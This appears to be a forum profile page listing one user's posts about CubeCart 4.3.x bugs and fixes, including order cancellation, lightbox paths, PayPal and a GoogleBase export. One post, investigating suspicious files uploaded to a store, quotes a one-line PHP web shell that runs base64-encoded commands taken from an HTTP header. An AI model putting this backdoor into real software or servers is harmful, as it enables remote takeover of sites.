onebrowncow
-
Posts
119 -
Joined
-
Last visited
Posts posted by onebrowncow
-
-
I did not make any other code changes and after this change all worked fine for me including next / prev. May be worth checking the lightbox image folder has the correct file attribute set , chmod 755
-
Had some problem, changed file js/lightbox.js from this
LightboxOptions = Object.extend({ fileLoadingImage: 'images/lightbox/loading.gif', fileBottomNavCloseImage: 'images/lightbox/closelabel.gif',to this
LightboxOptions = Object.extend({ fileLoadingImage: '/images/lightbox/loading.gif', fileBottomNavCloseImage: '/images/lightbox/closelabel.gif', -
Sorry Al drawn a blank as I forgot to set the logs up properly, the following is the response from my support:
I have investigated and do not believe the account was accessed by FTP or the server control panel, but can't confirm how the file was uploaded as I don't have the raw HTTP logs. The system also runs suhosin and uses the latest version of PHP, and there haven't been any root SSH logins
-
Yeah that makes a difference. Can you "grep" the logfiles to look for this file name or any of the "rte" paths.
I've got my server support looking into this for me, I'll pass your request on and get back as soon as we have more info.
-
Hi Al,
we're not set up on a budget server, our site is hosted on a VDS restricted to 12 accounts per server. Still a risk element I know but not as bad as a budget space. Unfortunately as I'm in charge of the space I'd didnt realise I hadn't set the log files to archive so I dont have a raw log file for the date the files appeared. I do have some other data and I will go through those and see if I can find anything unusual.
Support at the hosting compay suggested that access may ahve been gain via Cubecarts upload facility, I assume they mean pciture manager, but again I don't have the evidence to support this.
-
Also had this file appear and a variation .moo.php(1).fla both in the images/uploads folder seems also to have appeared on the 22nd June. They don't open in flash and size of file when properties are check is different 1kb and 4kb suggesting possible hidden coding.
I've deleted them from my server. They don't trigger spyware or virus warnings when scanned. No idea what they are. Both were set to 777 which is odd as my image folders are set to 755
Any info much appreciated as currently unable to track the source.
update: this made interesting reading, is this what's happening if so is there a security hole in 4.3.3 ? and how quick can it be fixed?
Encapsulating CSRF attacks http://blog.guya.net/category/flash-security/
and Google searches for <?php error_reporting(0);${print(_code_)}.${passthru(base64_decode($_SERVER[HTTP_CMD]))}.${print(_code_)} ?> references several possible code exploit options
I think this needs checking out asap
15.12pm further update: I've spoken to my server host and they say it appears the files were uploaded through cubecart. I'm posting a bug report on this.
-
There is a commercial mod available for this over at cubecartforums.org
-
This thread contains two issues which unfortunately have been posted in the same location due to the thread title. This is how I see it.
1] Skyman experienced an issue after the order has been completed and paid for only for customers immediately returning to the store to find thier chosen items still in their basket whcich should have been emptied on order completion. The bug fix posted by Convict fixes this particular issue and only this issue.
2] Astrodude and Onebrowncow (myself
) have a problem where, when a customer reaches the make payment page if the customer changes their mind at this point and clicks the continue shopping link they are returned to the store to do what appears to be continuing with their shopping, but the order they have just generated and navigated back away from by clicking the continue shopping link is automatically cancelled, a new order is automatically raised which can contain some or all of the previously raised order or may or may not have dropped part of the basket contents from the basket - totally confusing the customer as well as emailing them an order cancelled email and resulting in them leaving the site. As yet there appears to be no fix for issue 2 other than the offer of a change in future releases, not much help when it didn't happen before I upgraded to 4.3.3 and as we dont know when the next release of Cubecart will be. In the meantime my quick fix solution is going to be to remove the continue shopping link from the cart menus and all I ask of support is that they at least have a play around with the scenarios we are talking about and see what's happening. Thanks.
you may also like to know: cubecart version 4.3.3 PHP Version 5.2.9 running IE7 on XP
Oh btw Convict I had to look up the word felicitous - LOL so learnt a new word today!
-
Convict - comment on your code addition noted, sorry for the misunderstanding on this matter.
However I have to agree with AstroDude. What is the point having a link titled 'Continue Shopping' on the make payment page if when it is clicked it cancels the order and sends an order cancelled email to the customer. Thats not continuing shopping, thats cancelling and starting again.
I have been playing with this part of the cart on and off for a few days, I also experience a problem where, when clicking the continue shopping link it does not always go back to the basket as it was last left but can drop the last item added reverting to a state previous, continuing and clicking back to say the homepage and the items can re-appear in the basket or the basket can appear empty but when you add another new item all previous items re-appear.
I've used cubecart in all version of 4 and updated as soon as each new version has become available, but never before have I encounter a problem where basically the basket seems to have a hole in the bottom through which items can randomly fall through.
-
I have upgraded to 4.3.3 this week and now have this problem too. Anyone reaching the make payment page then deciding to click the continue shopping link has had the last item added to basket removed and the order cancelled or all items added remain in the basket but the order is cancelled. This is an important issue and needs looking at urgently! Installing the suggested code change by Convict to see what happens.
Edit: added code as suggested, cleared cache, no change still piles up cancelled order after cancelled order.
-
Thanks for confirming its not upgrade related. Wonder if the team are going to do anything to make this available again or have we lost another feature?
-
Ok thanks Estelle, must have missed that one, least I know its not my install. Note to developers I'd like to see this feature back please.
-
I've not tried to add an order manually for a while, but after upgrading to 4.3.2 I noticed that after clicking add order from orders in admin on the first line after the order ID number is a box called customer, in previous versions I use to be able to select a customer to whom I could add a new order manually. That box is empty and there is no drop down showing anymore. I also noticed that in orders which have come in via the net that this box only contains a customer number and no longer shows the customer name. I just can't work out why its changed and can only assume its something in the new version of the admin folder or a mistake on my part. Any help appreciated. Thanks!
-
Not sure if these are connected, but I upgraded to v 4.3.2 today and now when I click on the ip address in stats > customers online > ip address then click on the full address in the middle of the window which opens I get a response http://www.dnsstuff.com/where-are-my-results/ with no info about the IP address I've clicked. I use to find this really useful for tracking down spam and bots. Any thoughts?
-
Exactly the same problem occuring for us. Started yesterday. Also notice that the PayPal email notifications have a different layout and logo and that the PayPal site has changed in the transactions area.
I suspect that a change has occured at PayPal's end and that we need a tweek or mod of the PayPal payment gateway asap.
-
I'm having the same problem, this same error message occurs from time to time. I've spoken to my host and they say its not a server problem but a problem with the script which connects to the SQL database not closing the connections after a request is made causing these error message and that I should check to make sure I have my script configured correctly.
So where do I go from here. Is it a problem in the sql connection script or is it my host spinning me a line. Either way I asked for the 'max_user_connections' value to be increased and got a flat no. Does anyone know a reasonable level that it should be set at? mines set at 10.
Thanks
GoogleBase new Attributes export.inc needs an update
in Technical Help
Posted
I recently came across a problem with my text file submitted to GoogleBase, although the products were showing in base they did not link back to my website, instead they linked to a base google url
The exported cubecart txt file in v4.3.2 is using extinct attributes. I've not been able to find any information on the forums re updating the affected attributes on the forums. The extinct attributes are product_url name and image_url
Open admin > sources > products > export.inc.php and find the following line around line 40
if ($results == true) { $googleBaseContent = "id\tproduct_url\tname\tdescription\timage_url\tprice\tcurrency\tcondition\r\n";if ($results == true) { $googleBaseContent = "id\tlink\ttitle\tdescription\timage_link\tprice\tcurrency\tcondition\r\n";This quick change seems to solve the problem as my products are now all correctly showing on GoogleBase with links directly to the product on our website.
(This info also published on cubecartforums.org forums)